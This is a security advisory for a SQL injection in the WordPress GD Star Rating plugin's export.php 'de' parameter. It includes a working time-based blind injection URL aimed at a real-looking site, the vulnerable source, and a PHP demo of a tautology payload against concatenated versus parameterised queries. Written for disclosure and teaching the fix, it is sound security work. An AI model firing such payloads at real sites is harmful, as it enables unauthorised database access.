Title: WordPress GD Star Rating plugin <= 1.9.10 SQL Injection Vulnerability
Author: Miroslav Stampar (miroslav.stampar (at) gmail.com @stamparm)
Download: http://downloads.wordpress.org/plugin/gd-star-rating.zip
Tested version: 1.9.10
Tip: magic_quotes has to be turned off
---
Test
---
http://www.bkjia.com/wp-content/plugins/gd-star-rating/export.php?ex=user&us=dummy&de=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
---------------
Code Analysis
---------------
./export.php

require_once("./code/cls/export.php");
...
if (isset($_GET["ex"])) {
    $export_type = $_GET["ex"];
    ...
    switch ($export_type) {
        case "user":
            header('Content-Type: text/csv');
            header('Content-Disposition: attachment; filename="gdsr_export_'.$export_name.'.csv"');
            // "us" and "de" are passed straight from the request, unfiltered
            $sql  = GDSRExport::export_users($_GET["us"], $_GET["de"], $get_data);
            $rows = $wpdb->get_results($sql, ARRAY_N);
./code/cls/export.php

class GDSRExport {
    ...
    function export_users($user_data = "min", $data_export = "article", $get_data = array()) {
        ...
        $where = array();
        ...
        // $data_export is $_GET["de"]; a single quote in it closes the literal and
        // the remainder becomes part of the WHERE clause (the injection point)
        $where[] = "v.vote_type = '".$data_export."'";
        ...
        $j_where = join(" and ", $where);
        ...
        return sprintf("select %s from %s where %s order by u.id",
            $j_select, $j_tables, $j_where);
Fix: filter the user-supplied parameters before they are placed in the query.
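As an added example (not the plugin's code), the query-building pattern of export_users() next to a parameterised version, run against a constructed in-memory SQLite table so it executes stand-alone with php-cli and pdo_sqlite; PDO stands in for $wpdb here:

```php
<?php
// Added example, not GD Star Rating code. Table, rows and the hostile input are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("create table votes (id integer primary key, user_id integer, vote_type text)");
$db->exec("insert into votes (user_id, vote_type) values (1,'article'), (2,'comment'), (3,'comment')");

// Vulnerable: mirrors export_users(), which splices $_GET['de'] into the WHERE clause.
function export_users_vulnerable(PDO $db, string $data_export): array {
    $where   = array();
    $where[] = "v.vote_type = '" . $data_export . "'";   // caller controls the quoted value
    $j_where = join(" and ", $where);
    $sql     = sprintf("select %s from %s where %s order by %s",
                       "v.user_id", "votes v", $j_where, "v.id");
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: the value travels as a bound parameter, so the SQL text never contains it.
// In the plugin the equivalent is $wpdb->prepare() with a %s placeholder.
function export_users_safe(PDO $db, string $data_export): array {
    $sql  = "select v.user_id from votes v where v.vote_type = :vote_type order by v.id";
    $stmt = $db->prepare($sql);
    $stmt->execute(array(':vote_type' => $data_export));
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed input: closes the quote and appends a tautology, the same class of
// quote-breakout the advisory's "de" parameter suffers from.
$hostile = "article' or 'a'='a";

$leaked = export_users_vulnerable($db, $hostile);  // 3 rows: the WHERE clause was rewritten
$safe   = export_users_safe($db, $hostile);        // 0 rows: no vote_type equals that literal
printf("vulnerable: %d rows, parameterised: %d rows\n", count($leaked), count($safe));
```

The contrast is the whole fix: once the value is bound instead of concatenated, the quote inside it is data rather than SQL, and magic_quotes being on or off no longer matters.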